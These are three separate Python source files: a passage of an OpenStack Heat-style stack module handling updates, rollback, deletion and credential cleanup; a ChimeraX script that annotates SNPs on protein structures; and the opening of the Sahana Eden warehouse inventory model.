else:
LOG.info(_LI("Triggering resource %s for cleanup"),
rsrc_id)
input_data = sync_point.serialize_input_data({})
self.worker_client.check_resource(self.context, rsrc_id,
self.current_traversal,
input_data, is_update,
self.adopt_stack_data)
def rollback(self):
old_tmpl_id = self.prev_raw_template_id
if old_tmpl_id is None:
rollback_tmpl = tmpl.Template.create_empty_template(
version=self.t.version)
else:
rollback_tmpl = tmpl.Template.load(self.context, old_tmpl_id)
self.prev_raw_template_id = None
stack_id = self.store()
if stack_id is None:
# Failed concurrent update
LOG.warn(_LW("Failed to store stack %(name)s with traversal ID"
" %(trvsl_id)s, not trigerring rollback."),
{'name': self.name,
'trvsl_id': self.current_traversal})
return
self.converge_stack(rollback_tmpl, action=self.ROLLBACK)
def _get_best_existing_rsrc_db(self, rsrc_name):
candidate = None
if self.ext_rsrcs_db:
for id, ext_rsrc in self.ext_rsrcs_db.items():
if ext_rsrc.name != rsrc_name:
continue
if ext_rsrc.current_template_id == self.t.id:
# Rollback where the previous resource still exists
candidate = ext_rsrc
break
elif (ext_rsrc.current_template_id ==
self.prev_raw_template_id):
# Current resource is otherwise a good candidate
candidate = ext_rsrc
return candidate
def _update_or_store_resources(self):
self.ext_rsrcs_db = self._db_resources_get(key_id=True)
curr_name_translated_dep = self.dependencies.translate(lambda res:
res.name)
rsrcs = {}
def update_needed_by(res):
new_requirers = set(
rsrcs[rsrc_name].id for rsrc_name in
curr_name_translated_dep.required_by(res.name)
)
old_requirers = set(res.needed_by) if res.needed_by else set()
needed_by = old_requirers | new_requirers
res.needed_by = list(needed_by)
for rsrc in reversed(self.dependencies):
existing_rsrc_db = self._get_best_existing_rsrc_db(rsrc.name)
if existing_rsrc_db is None:
update_needed_by(rsrc)
rsrc.current_template_id = self.t.id
rsrc._store()
rsrcs[rsrc.name] = rsrc
else:
update_needed_by(existing_rsrc_db)
resource.Resource.set_needed_by(
existing_rsrc_db, existing_rsrc_db.needed_by
)
rsrcs[existing_rsrc_db.name] = existing_rsrc_db
return rsrcs
def _compute_convg_dependencies(self, existing_resources,
current_template_deps, current_resources):
def make_graph_key(rsrc):
return current_resources[rsrc.name].id, True
dep = current_template_deps.translate(make_graph_key)
if existing_resources:
for rsrc_id, rsrc in existing_resources.items():
dep += (rsrc_id, False), None
for requirement in rsrc.requires:
if requirement in existing_resources:
dep += (requirement, False), (rsrc_id, False)
if rsrc.replaces in existing_resources:
dep += (rsrc.replaces, False), (rsrc_id, False)
if (rsrc.id, True) in dep:
dep += (rsrc_id, False), (rsrc_id, True)
self._convg_deps = dep
@property
def convergence_dependencies(self):
if self._convg_deps is None:
current_deps = ([tuple(i), (tuple(j) if j is not None else None)]
for i, j in self.current_deps['edges'])
self._convg_deps = dependencies.Dependencies(edges=current_deps)
return self._convg_deps
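# Hedged sketch of the stored edge format this property rebuilds from: each
# entry in self.current_deps['edges'] is a pair of graph keys of the form
# [[rsrc_id, is_update], [required_id, is_update]] or [[rsrc_id, is_update],
# None] (see _converge_create_or_update above). The concrete ids below are
# hypothetical:
#
# {'edges': [[[5, True], [4, True]], [[4, False], None]]}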
@scheduler.wrappertask
def update_task(self, newstack, action=UPDATE, event=None):
if action not in (self.UPDATE, self.ROLLBACK, self.RESTORE):
LOG.error(_LE("Unexpected action %s passed to update!"), action)
self.state_set(self.UPDATE, self.FAILED,
"Invalid action %s" % action)
return
try:
lifecycle_plugin_utils.do_pre_ops(self.context, self,
newstack, action)
except Exception as e:
self.state_set(action, self.FAILED, e.args[0] if e.args else
'Failed stack pre-ops: %s' % six.text_type(e))
return
if self.status == self.IN_PROGRESS:
if action == self.ROLLBACK:
LOG.debug("Starting update rollback for %s" % self.name)
else:
self.state_set(action, self.FAILED,
'State invalid for %s' % action)
return
# Save a copy of the new template. To avoid two DB writes
# we store the ID at the same time as the action/status
prev_tmpl_id = self.prev_raw_template_id
bu_tmpl = copy.deepcopy(newstack.t)
self.prev_raw_template_id = bu_tmpl.store()
self.action = action
self.status = self.IN_PROGRESS
self.status_reason = 'Stack %s started' % action
self._send_notification_and_add_event()
self.store()
if prev_tmpl_id is not None:
raw_template_object.RawTemplate.delete(self.context, prev_tmpl_id)
if action == self.UPDATE:
# Oldstack is useless when the action is not UPDATE, so we don't
# need to build it; this avoids some unexpected errors.
kwargs = self.get_kwargs_for_cloning()
oldstack = Stack(self.context, self.name, copy.deepcopy(self.t),
**kwargs)
backup_stack = self._backup_stack()
existing_params = environment.Environment({env_fmt.PARAMETERS:
self.t.env.params})
previous_template_id = None
try:
update_task = update.StackUpdate(
self, newstack, backup_stack,
rollback=action == self.ROLLBACK,
error_wait_time=cfg.CONF.error_wait_time)
updater = scheduler.TaskRunner(update_task)
self.parameters = newstack.parameters
self.t.files = newstack.t.files
self.t.env = newstack.t.env
self.disable_rollback = newstack.disable_rollback
self.timeout_mins = newstack.timeout_mins
self._set_param_stackid()
self.tags = newstack.tags
if newstack.tags:
stack_tag_object.StackTagList.set(self.context, self.id,
newstack.tags)
else:
stack_tag_object.StackTagList.delete(self.context, self.id)
try:
updater.start(timeout=self.timeout_secs())
yield
while not updater.step():
if event is None or not event.ready():
yield
else:
message = event.wait()
self._message_parser(message)
finally:
self.reset_dependencies()
if action in (self.UPDATE, self.RESTORE, self.ROLLBACK):
self.status_reason = 'Stack %s completed successfully' % action
self.status = self.COMPLETE
except scheduler.Timeout:
self.status = self.FAILED
self.status_reason = 'Timed out'
except (ForcedCancel, exception.ResourceFailure) as e:
# If rollback is enabled and a resource failure occurred,
# we do another update with the existing template,
# so we roll back to the original state
if self._update_exception_handler(
exc=e, action=action, update_task=update_task):
yield self.update_task(oldstack, action=self.ROLLBACK)
return
else:
LOG.debug('Deleting backup stack')
backup_stack.delete(backup=True)
# flip the template to the newstack values
previous_template_id = self.t.id
self.t = newstack.t
template_outputs = self.t[self.t.OUTPUTS]
self.outputs = self.resolve_static_data(template_outputs)
# Don't use state_set, so that we do only one update query and avoid a
# race condition with the COMPLETE status
self.action = action
self._send_notification_and_add_event()
if self.status == self.FAILED:
# Since template was incrementally updated based on existing and
# new stack resources, we should have user params of both.
existing_params.load(newstack.t.env.user_env_as_dict())
self.t.env = existing_params
self.t.store(self.context)
backup_stack.t.env = existing_params
backup_stack.t.store(self.context)
self.store()
if previous_template_id is not None:
raw_template_object.RawTemplate.delete(self.context,
previous_template_id)
lifecycle_plugin_utils.do_post_ops(self.context, self,
newstack, action,
(self.status == self.FAILED))
def _update_exception_handler(self, exc, action, update_task):
"""Handle exceptions in update_task.
Decide whether we should cancel the running tasks, and whether we should
roll back, depending on the disable_rollback flag when a forced rollback
was not requested.
:returns: True if a rollback is required, False otherwise.
"""
self.status_reason = six.text_type(exc)
self.status = self.FAILED
if action != self.UPDATE:
return False
if isinstance(exc, ForcedCancel):
update_task.updater.cancel_all()
return exc.with_rollback or not self.disable_rollback
return not self.disable_rollback
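# Illustrative decision table for the handler above (a summary of the code
# paths, with example flag values):
#   action != UPDATE                  -> False (never roll back)
#   ForcedCancel(with_rollback=True)  -> True
#   ForcedCancel(with_rollback=False) -> True only if rollback is not disabled
#   other failures                    -> True only if rollback is not disabled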
def _message_parser(self, message):
if message == rpc_api.THREAD_CANCEL:
raise ForcedCancel(with_rollback=False)
elif message == rpc_api.THREAD_CANCEL_WITH_ROLLBACK:
raise ForcedCancel(with_rollback=True)
def _delete_backup_stack(self, stack):
# Delete resources in the backup stack referred to by 'stack'
def failed(child):
return (child.action == child.CREATE and
child.status in (child.FAILED, child.IN_PROGRESS))
def copy_data(source_res, destination_res):
if source_res.data():
for key, val in six.iteritems(source_res.data()):
destination_res.data_set(key, val)
for key, backup_res in stack.resources.items():
# If UpdateReplace failed, we must restore backup_res
# to the existing stack, since it may have dependencies in
# these stacks. curr_res is the resource that was just
# created and failed, so put it into the stack to be deleted anyway.
backup_res_id = backup_res.resource_id
curr_res = self.resources.get(key)
if backup_res_id is not None and curr_res is not None:
curr_res_id = curr_res.resource_id
if (any(failed(child) for child in
self.dependencies[curr_res]) or
curr_res.status in
(curr_res.FAILED, curr_res.IN_PROGRESS)):
# If a child resource failed to update, curr_res
# should be replaced to resolve the dependencies. This
# is not a fundamental solution: if the children contain
# both failed and successfully updated resources, the
# stack cannot be deleted.
# The Stack class owns dependencies as a set of resource
# objects, so we switch the members of the resource that
# is needed to delete it.
self.resources[key].resource_id = backup_res_id
self.resources[key].properties = backup_res.properties
copy_data(backup_res, self.resources[key])
stack.resources[key].resource_id = curr_res_id
stack.resources[key].properties = curr_res.properties
copy_data(curr_res, stack.resources[key])
stack.delete(backup=True)
def _try_get_user_creds(self):
# There are cases where the user_creds cannot be returned
# because the credentials were truncated when being saved to the DB.
# Ignore this error instead of blocking stack deletion.
user_creds = None
try:
user_creds = ucreds_object.UserCreds.get_by_id(self.user_creds_id)
except exception.Error as err:
LOG.exception(err)
pass
return user_creds
def _delete_credentials(self, stack_status, reason, abandon):
# Cleanup stored user_creds so they aren't accessible via
# the soft-deleted stack which remains in the DB
# The stack_status and reason passed in are current values, which
# may get rewritten and returned from this method
if self.user_creds_id:
user_creds = self._try_get_user_creds()
# If we created a trust, delete it
if user_creds is not None:
trust_id = user_creds.get('trust_id')
if trust_id:
try:
# If the trustor doesn't match the context user,
# we have to use the stored context to clean up the
# trust: although the user evidently has
# permission to delete the stack, they don't have
# rights to delete the trust unless they are an admin
trustor_id = user_creds.get('trustor_user_id')
if self.context.user_id != trustor_id:
LOG.debug("Context user_id doesn't match "
"trustor, using stored context")
sc = self.stored_context()
sc.clients.client('keystone').delete_trust(
trust_id)
else:
self.clients.client('keystone').delete_trust(
trust_id)
except Exception as ex:
LOG.exception(ex)
stack_status = self.FAILED
reason = ("Error deleting trust: %s" %
six.text_type(ex))
# Delete the stored credentials
try:
ucreds_object.UserCreds.delete(self.context,
self.user_creds_id)
except exception.NotFound:
LOG.info(_LI("Tried to delete user_creds that do not exist "
"(stack=%(stack)s user_creds_id=%(uc)s)"),
{'stack': self.id, 'uc': self.user_creds_id})
try:
self.user_creds_id = None
self.store()
except exception.NotFound:
LOG.info(_LI("Tried to store a stack that does not exist %s"),
self.id)
# If the stack has a domain project, delete it
if self.stack_user_project_id and not abandon:
try:
keystone = self.clients.client('keystone')
keystone.delete_stack_domain_project(
project_id=self.stack_user_project_id)
except Exception as ex:
LOG.exception(ex)
stack_status = self.FAILED
reason = "Error deleting project: %s" % six.text_type(ex)
return stack_status, reason
@profiler.trace('Stack.delete', hide_args=False)
@reset_state_on_error
def delete(self, action=DELETE, backup=False, abandon=False):
"""Delete all of the resources, and then the stack itself.
The action parameter is used to differentiate between a user
initiated delete and an automatic stack rollback after a failed
create, which amount to the same thing, but the states are recorded
differently.
Note that abandon is a delete where all resources have been set to a
RETAIN deletion policy, but we also don't want to delete anything
required for those resources, e.g. the stack_user_project.
"""
if action not in (self.DELETE, self.ROLLBACK):
LOG.error(_LE("Unexpected action %s passed to delete!"), action)
self.state_set(self.DELETE, self.FAILED,
"Invalid action %s" % action)
return
stack_status = self.COMPLETE
reason = 'Stack %s completed successfully' % action
self.state_set(action, self.IN_PROGRESS, 'Stack %s started' %
action)
backup_stack = self._backup_stack(False)
if backup_stack:
self._delete_backup_stack(backup_stack)
if backup_stack.status != backup_stack.COMPLETE:
errs = backup_stack.status_reason
failure = 'Error deleting backup resources: %s' % errs
self.state_set(action, self.FAILED,
'Failed to %s : %s' % (action, failure))
return
snapshots = snapshot_object.Snapshot.get_all(self.context,
self.id)
for snapshot in snapshots:
self.delete_snapshot(snapshot)
snapshot_object.Snapshot.delete(self.context, snapshot.id)
if not backup:
try:
lifecycle_plugin_utils.do_pre_ops(self.context, self,
None, action)
except Exception as e:
self.state_set(action, self.FAILED,
e.args[0] if e.args else
'Failed stack pre-ops: %s' % six.text_type(e))
return
action_task = scheduler.DependencyTaskGroup(self.dependencies,
resource.Resource.destroy,
reverse=True)
try:
scheduler.TaskRunner(action_task)(timeout=self.timeout_secs())
except exception.ResourceFailure as ex:
stack_status = self.FAILED
reason = 'Resource %s failed: %s' % (action, six.text_type(ex))
except scheduler.Timeout:
stack_status = self.FAILED
reason = '%s timed out' % action.title()
# If the stack delete succeeded, and this is neither a backup stack
# nor a nested stack, we should delete the credentials
if stack_status != self.FAILED and not backup and not self.owner_id:
stack_status, reason = self._delete_credentials(stack_status,
reason,
abandon)
try:
self.state_set(action, stack_status, reason)
except exception.NotFound:
LOG.info(_LI("Tried to delete stack that does not exist "
"%s "), self.id)
if not backup:
lifecycle_plugin_utils.do_post_ops(self.context, self,
None, action,
(self.status == self.FAILED))
if stack_status != self.FAILED:
# delete the stack
try:
stack_object.Stack.delete(self.context, self.id)
except exception.NotFound:
LOG.info(_LI("Tried to delete stack that does not exist "
"%s "), self.id)
self.id = None
@profiler.trace('Stack.suspend', hide_args=False)
@reset_state_on_error
def suspend(self):
"""Suspend the stack.
Invokes handle_suspend for all stack resources.
Waits for all resources to become SUSPEND_COMPLETE then declares the
stack SUSPEND_COMPLETE.
Note the default implementation for all resources is to do nothing
other than move to SUSPEND_COMPLETE, so the resources must implement
handle_suspend for this to have any effect.
"""
# No need to suspend if the stack has been suspended
if self.state == (self.SUSPEND, self.COMPLETE):
LOG.info(_LI('%s is already suspended'), six.text_type(self))
return
self.updated_time = oslo_timeutils.utcnow()
sus_task = scheduler.TaskRunner(
self.stack_task,
action=self.SUSPEND,
reverse=True,
error_wait_time=cfg.CONF.error_wait_time)
sus_task(timeout=self.timeout_secs())
@profiler.trace('Stack.resume', hide_args=False)
@reset_state_on_error
def resume(self):
"""Resume the stack.
Invokes handle_resume for all stack resources.
Waits for all resources to become RESUME_COMPLETE then declares the
stack RESUME_COMPLETE.
Note the default implementation for all resources is to do nothing
other than move to RESUME_COMPLETE, so the resources must implement
handle_resume for this to have any effect.
"""
# No need to resume if the stack has been resumed
if self.state == (self.RESUME, self.COMPLETE):
LOG.info(_LI('%s is already resumed'), six.text_type(self))
return
self.updated_time = oslo_timeutils.utcnow()
sus_task = scheduler.TaskRunner(
self.stack_task,
action=self.RESUME,
reverse=False,
error_wait_time=cfg.CONF.error_wait_time)
sus_task(timeout=self.timeout_secs())
@profiler.trace('Stack.snapshot', hide_args=False)
@reset_state_on_error
def snapshot(self, save_snapshot_func):
"""Snapshot the stack, invoking handle_snapshot on all resources."""
self.updated_time = oslo_timeutils.utcnow()
sus_task = scheduler.TaskRunner(
self.stack_task,
action=self.SNAPSHOT,
reverse=False,
error_wait_time=cfg.CONF.error_wait_time,
pre_completion_func=save_snapshot_func)
sus_task(timeout=self.timeout_secs())
@profiler.trace('Stack.delete_snapshot', hide_args=False)
def delete_snapshot(self, snapshot):
"""Remove a snapshot from the backends."""
for name, rsrc in six.iteritems(self.resources):
snapshot_data = snapshot.data
if snapshot_data:
data = snapshot.data['resources'].get(name)
scheduler.TaskRunner(rsrc.delete_snapshot, data)()
@profiler.trace('Stack.restore', hide_args=False)
@reset_state_on_error
def restore(self, snapshot):
"""Restore the given snapshot.
Invokes handle_restore on all resources.
"""
self.updated_time = oslo_timeutils.utcnow()
env = environment.Environment(snapshot.data['environment'])
files = snapshot.data['files']
template = tmpl.Template(snapshot.data['template'],
env=env, files=files)
newstack = self.__class__(self.context, self.name, template,
timeout_mins=self.timeout_mins,
disable_rollback=self.disable_rollback)
for name, defn in six.iteritems(
template.resource_definitions(newstack)):
rsrc = resource.Resource(name, defn, self)
data = snapshot.data['resources'].get(name)
handle_restore = getattr(rsrc, 'handle_restore', None)
if callable(handle_restore):
defn = handle_restore(defn, data)
template.add_resource(defn, name)
newstack.parameters.set_stack_id(self.identifier())
updater = scheduler.TaskRunner(self.update_task, newstack,
action=self.RESTORE)
updater()
@profiler.trace('Stack.output', hide_args=False)
def output(self, key):
"""Get the value of the specified stack output."""
value = self.outputs[key].get('Value', '')
try:
return function.resolve(value)
except Exception as ex:
self.outputs[key]['error_msg'] = six.text_type(ex)
return None
def restart_resource(self, resource_name):
"""Restart the resource specified by resource_name.
stop resource_name and all that depend on it
start resource_name and all that depend on it
"""
deps = self.dependencies[self[resource_name]]
failed = False
for res in reversed(deps):
try:
scheduler.TaskRunner(res.destroy)()
except exception.ResourceFailure as ex:
failed = True
LOG.error(_LE('Resource %(name)s delete failed: %(ex)s'),
{'name': res.name, 'ex': ex})
for res in deps:
if not failed:
try:
res.state_reset()
scheduler.TaskRunner(res.create)()
except exception.ResourceFailure as ex:
LOG.exception(_LE('Resource %(name)s create failed: '
'%(ex)s'), {'name': res.name, 'ex': ex})
failed = True
else:
res.state_set(res.CREATE, res.FAILED,
'Resource restart aborted')
# TODO(asalkeld) if any of this fails we should
# restart the whole stack
def get_availability_zones(self):
nova = self.clients.client('nova')
if self._zones is None:
self._zones = [
zone.zoneName for zone in
nova.availability_zones.list(detailed=False)]
return self._zones
def set_stack_user_project_id(self, project_id):
self.stack_user_project_id = project_id
self.store()
@profiler.trace('Stack.create_stack_user_project_id', hide_args=False)
def create_stack_user_project_id(self):
project_id = self.clients.client(
'keystone').create_stack_domain_project(self.id)
self.set_stack_user_project_id(project_id)
@profiler.trace('Stack.prepare_abandon', hide_args=False)
def prepare_abandon(self):
return {
'name': self.name,
'id': self.id,
'action': self.action,
'environment': self.env.user_env_as_dict(),
'files': self.t.files,
'status': self.status,
'template': self.t.t,
'resources': dict((res.name, res.prepare_abandon())
for res in six.itervalues(self.resources)),
'project_id': self.tenant_id,
'stack_user_project_id': self.stack_user_project_id,
'tags': self.tags,
}
def resolve_static_data(self, snippet):
try:
return self.t.parse(self, snippet)
except AssertionError:
raise
except Exception as ex:
raise exception.StackValidationFailed(
message=encodeutils.safe_decode(six.text_type(ex)))
def reset_resource_attributes(self):
# nothing is cached if no resources exist
if not self._resources:
return
# a change in some resource may have side-effects in the attributes
# of other resources, so ensure that attributes are re-calculated
for res in six.itervalues(self.resources):
res.attributes.reset_resolved_values()
def has_cache_data(self, resource_name):
return (self.cache_data is not None and
self.cache_data.get(resource_name) is not None)
def cache_data_reference_id(self, resource_name):
return self.cache_data.get(
resource_name, {}).get('reference_id')
def cache_data_resource_attribute(self, resource_name, attribute_key):
return self.cache_data.get(
resource_name, {}).get('attrs', {}).get(attribute_key)
def cache_data_resource_all_attributes(self, resource_name):
attrs = self.cache_data.get(resource_name, {}).get('attributes', {})
return attrs
def mark_complete(self):
"""Mark the update as complete.
This currently occurs when all resources have been updated; there may
still be resources being cleaned up, but the Stack should now be in
service.
"""
LOG.info(_LI('[%(name)s(%(id)s)] update traversal %(tid)s complete'),
{'name': self.name, 'id': self.id,
'tid': self.current_traversal})
reason = 'Stack %s completed successfully' % self.action
updated = self.state_set(self.action, self.COMPLETE, reason)
if not updated:
return
self.purge_db()
def purge_db(self):
"""Cleanup database after stack has completed/failed.
1. Delete previous raw template if stack completes successfully.
2. Deletes all sync points. They are no longer needed after stack
has completed/failed.
3. Delete the stack if the action is DELETE.
"""
if (self.prev_raw_template_id is not None and
self.status != self.FAILED):
prev_tmpl_id = self.prev_raw_template_id
self.prev_raw_template_id = None
stack_id = self.store()
if stack_id is None:
# Failed concurrent update
LOG.warn(_LW("Failed to store stack %(name)s with traversal ID"
" %(trvsl_id)s, aborting stack purge"),
{'name': self.name,
'trvsl_id': self.current_traversal})
return
raw_template_object.RawTemplate.delete(self.context, prev_tmpl_id)
sync_point.delete_all(self.context, self.id, self.current_traversal)
if (self.action, self.status) == (self.DELETE, self.COMPLETE):
try:
stack_object.Stack.delete(self.context, self.id)
except exception.NotFound:
pass
def time_elapsed(self):
"""Time elapsed in seconds since the stack operation started."""
start_time = timeutils.round_to_seconds(self.updated_time or
self.created_time)
nowish = timeutils.round_to_seconds(datetime.datetime.utcnow())
return (nowish - start_time).seconds
def time_remaining(self):
"""Time left before stack times out."""
return self.timeout_secs() - self.time_elapsed()
def has_timed_out(self):
"""Returns True if this stack has timed-out."""
if self.status == self.IN_PROGRESS:
return self.time_elapsed() > self.timeout_secs()
return False
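# Illustrative sketch, not part of the original module: how the timeout
# helpers above compose. With timeout_mins=60 and an operation started ten
# minutes ago, time_elapsed() is roughly 600, time_remaining() roughly 3000,
# and has_timed_out() is False while the stack is IN_PROGRESS.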
|
# if you are seeing this file as text in a web browser, you need to configure
# chimerax as a helper application.
# Python code for chimerax files to display proteins with SNPs annotated.
# Due to a scoping bug in exec'ing code from chimerax files (1.3 alpha
# release and earlier), we can only have one function and must import into
# the function's local namespace.
def displayPdb(pdbSpec, snps):
"""pdbSpec can be a pdbId or a URL of a PDB format file.
snps is a list of (snpId, chain, snpPos, [isPrimary]) tuples."""
from chimera import runCommand
from chimera.selection import OSLSelection
runCommand("close all")
if pdbSpec.find("://") >= 0:
runCommand("open %s" % pdbSpec)
else:
runCommand("open pdb:%s" % pdbSpec)
# hide all models/sub-models, NMR will only show first model
runCommand("select #*:*.*")
runCommand("~display sel")
runCommand("~select")
# get model spec to use, testing for sub-models, as is the case with NMR
sel = OSLSelection("#0.1")
if len(sel.atoms()) > 0:
modelSpec = "#0.1"
else:
modelSpec = "#0"
caSpec = "%s:.*@CA" % modelSpec
# display ribbons
runCommand("ribbon %s" % caSpec)
runCommand("ribbackbone %s" % caSpec)
runCommand("focus %s" % caSpec)
for snp in snps:
(snpId, chain, snpPos) = snp[0:3]
if ((len(snp) > 3) and snp[3]):
color = "red"
else:
color = "gold"
spec = "%s:%s.%s@CA" % (modelSpec, snpPos, chain)
runCommand("color %s %s" % (color, spec))
runCommand("setattr r label \"%s\" %s" % (snpId, spec))
|
# -*- coding: utf-8 -*-
""" Sahana Eden Inventory Model
@copyright: 2009-2014 (c) Sahana Software Foundation
@license: MIT
Permission is hereby granted, free of charge, to any person
obtaining a copy of this software and associated documentation
files (the "Software"), to deal in the Software without
restriction, including without limitation the rights to use,
copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the
Software is furnished to do so, subject to the following
conditions:
The above copyright notice and this permission notice shall be
included in all copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES
OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT
HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY,
WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING
FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR
OTHER DEALINGS IN THE SOFTWARE.
"""
__all__ = ("S3WarehouseModel",
"S3InventoryModel",
"S3InventoryTrackingLabels",
"S3InventoryTrackingModel",
"S3InventoryAdjustModel",
"inv_tabs",
"inv_rheader",
"inv_rfooter",
"inv_recv_crud_strings",
"inv_recv_rheader",
"inv_send_rheader",
"inv_ship_status",
"inv_tracking_status",
"inv_adj_rheader",
"depends",
"inv_InvItemRepresent",
)
import itertools
from gluon import *
from gluon.sqlhtml import RadioWidget
from gluon.storage import Storage
from ..s3 import *
from s3layouts import S3AddResourceLink
SHIP_STATUS_IN_PROCESS = 0
SHIP_STATUS_RECEIVED = 1
SHIP_STATUS_SENT = 2
SHIP_STATUS_CANCEL = 3
SHIP_STATUS_RETURNING = 4
# Dependency list
depends = ["supply"]
# To pass to global scope
inv_ship_status = {"IN_PROCESS" : SHIP_STATUS_IN_PROCESS,
"RECEIVED" : SHIP_STATUS_RECEIVED,
"SENT" : SHIP_STATUS_SENT,
"CANCEL" : SHIP_STATUS_CANCEL,
"RETURNING" : SHIP_STATUS_RETURNING,
}
SHIP_DOC_PENDING = 0
SHIP_DOC_COMPLETE = 1
TRACK_STATUS_UNKNOWN = 0
TRACK_STATUS_PREPARING = 1
TRACK_STATUS_TRANSIT = 2
TRACK_STATUS_UNLOADING = 3
TRACK_STATUS_ARRIVED = 4
TRACK_STATUS_CANCELED = 5
TRACK_STATUS_RETURNING = 6
inv_tracking_status = {"UNKNOWN" : TRACK_STATUS_UNKNOWN,
"IN_PROCESS" : TRACK_STATUS_PREPARING,
"SENT" : TRACK_STATUS_TRANSIT,
"UNLOADING" : TRACK_STATUS_UNLOADING,
"RECEIVED" : TRACK_STATUS_ARRIVED,
"CANCEL" : TRACK_STATUS_CANCELED,
"RETURNING" : TRACK_STATUS_RETURNING,
}
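# Illustrative lookup sketch (an assumption, not module API): a reverse map is
# handy when rendering these codes, e.g.
#
# track_status_label = {v: k for k, v in inv_tracking_status.items()}
# track_status_label[TRACK_STATUS_TRANSIT]  # -> "SENT"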
# Compact JSON encoding
SEPARATORS = (",", ":")
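# Hedged example of how the compact separators are typically used (assumes
# json is imported where this constant is consumed):
#
# import json
# json.dumps({"status": SHIP_STATUS_SENT}, separators=SEPARATORS)
# # -> '{"status":2}'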
# =============================================================================
class S3WarehouseModel(S3Model):
names = ("inv_warehouse",
#"inv_warehouse_type",
)
def model(self):
T = current.T
#db = current.db
messages = current.messages
NONE = messages["NONE"]
#add_components = self.add_components
configure = self.configure
crud_strings = current.response.s3.crud_strings
define_table = self.define_table
super_link = self.super_link
# ---------------------------------------------------------------------
# Warehouse Types
#
# tablename = "inv_warehouse_type"
# define_table(tablename,
# Field("name", length=128,
# notnull=True, unique=True,
# label=T("Name")),
# s3_comments(),
# *s3_meta_fields())
# CRUD strings
#crud_strings[tablename] = Storage(
# label_create = T("Add Warehouse Type"),
# title_display = T("Warehouse Type Details"),
# title_list = T("Warehouse Types"),
# title_update = T("Edit Warehouse Type"),
# label_list_button = T("List Warehouse Types"),
# label_delete_button = T("Delete Warehouse Type"),
# msg_record_created = T("Warehouse Type added"),
# msg_record_modified = T("Warehouse Type updated"),
# msg_record_deleted = T("Warehouse Type deleted"),
# msg_list_empty = T("No Warehouse Types currently registered"))
#represent = S3Represent(lookup=tablename, translate=True)
#warehouse_type_id = S3ReusableField("warehouse_type_id", "reference %s" % tablename,
# label = T("Warehouse Type"),
# ondelete = "SET NULL",
# represent = represent,
# requires = IS_EMPTY_OR(
# IS_ONE_OF(db, "inv_warehouse_type.id",
# represent,
# sort=True
# )),
# sortby = "name",
# comment = S3AddResourceLink(c="inv",
# f="warehouse_type",
# label=T("Add Warehouse Type"),
# title=T("Warehouse Type"),
# tooltip=T("If you don't see the Type in the list, you can add a new one by clicking link 'Add Warehouse Type'.")),
# )
#configure(tablename,
# deduplicate = self.inv_warehouse_type_duplicate,
# )
# Tags as component of Warehouse Types
#add_components(tablename,
# inv_warehouse_type_tag={"name": "tag",
# "joinby": "warehouse_type_id",
# }
# )
# ---------------------------------------------------------------------
# Warehouses
#
tablename = "inv_warehouse"
define_table(tablename,
super_link("pe_id", "pr_pentity"),
super_link("site_id", "org_site"),
super_link("doc_id", "doc_entity"),
Field("name", notnull=True,
length=64, # Mayon Compatibility
label = T("Name"),
),
Field("code", length=10, # Mayon compatibility
label = T("Code"),
represent = lambda v: v or NONE,
# Deployments that don't want warehouse codes can hide them
#readable=False,
#writable=False,
# @ToDo: Deployment Setting to add validator to make these unique
),
self.org_organisation_id(
requires = self.org_organisation_requires(updateable=True),
),
#warehouse_type_id(),
self.gis_location_id(),
Field("phone1", label = T("Phone 1"),
represent = lambda v: v or NONE,
requires = IS_EMPTY_OR(s3_phone_requires)
),
Field("phone2", label = T("Phone 2"),
represent = lambda v: v or NONE,
requires = IS_EMPTY_OR(s3_phone_requires)
),
Field("email", label = T("Email"),
represent = lambda v: v or NONE,
requires = IS_EMPTY_OR(IS_EMAIL())
),
Field("fax", label = T("Fax"),
represent = lambda v: v or NONE,
requires = IS_EMPTY_OR(s3_phone_requires)
),
Field("obsolete", "boolean",
default = False,
label = T("Obsolete"),
represent = lambda opt: \
(opt and [T("Obsolete")] or NONE)[0],
readable = False,
writable = False,
),
s3_comments(),
*s3_meta_fields())
# CRUD strings
crud_strings[tablename] = Storage(
label_create = T("Create Warehouse"),
title_display = T("Warehouse Details"),
title_list = T("Warehouses"),
title_update = T("Edit Warehouse"),
title_upload = T("Import Warehouses"),
title_map = T("Map of Warehouses"),
label_list_button = T("List Warehouses"),
label_delete_button = T("Delete Warehouse"),
msg_record_created = T("Warehouse added"),
msg_record_modified = T("Warehouse updated"),
msg_record_deleted = T("Warehouse deleted"),
msg_list_empty = T("No Warehouses currently registered"))
# Filter widgets
filter_widgets = [
S3TextFilter(["name",
"code",
"comments",
"organisation_id$name",
"organisation_id$acronym",
"location_id$name",
"location_id$L1",
"location_id$L2",
],
label=T("Name"),
_class="filter-search",
),
S3OptionsFilter("organisation_id",
label=T("Organization"),
represent="%(name)s",
widget="multiselect",
cols=3,
#hidden=True,
),
S3LocationFilter("location_id",
label=T("Location"),
levels=["L0", "L1", "L2"],
widget="multiselect",
cols=3,
#hidden=True,
),
]
configure(tablename,
deduplicate = self.inv_warehouse_duplicate,
filter_widgets=filter_widgets,
list_fields=["id",
"name",
"organisation_id", # Filtered in Component views
#"type",
#(T("Address"), "location_id$addr_street"),
(messages.COUNTRY, "location_id$L0"),
"location_id$L1",
"location_id$L2",
"location_id$L3",
#"location_id$L4",
"phone1",
"email"
],
onaccept = self.inv_warehouse_onaccept,
realm_components = ("contact_emergency",
"physical_description",
"config",
"image",
"req",
"send",
"human_resource_site",
"note",
"contact",
"role",
"asset",
"commit",
"inv_item",
"document",
"recv",
"address",
),
super_entity = ("pr_pentity", "org_site"),
update_realm = True,
)
# ---------------------------------------------------------------------
# Pass names back to global scope (s3.*)
#
return dict()
# -------------------------------------------------------------------------
#@staticmethod
#def inv_warehouse_type_duplicate(item):
# """ Import item de-duplication """
# if item.tablename == "inv_warehouse_type":
# table = item.table
# name = item.data.get("name", None)
# query = (table.name.lower() == name.lower())
# duplicate = current.db(query).select(table.id,
# limitby=(0, 1)).first()
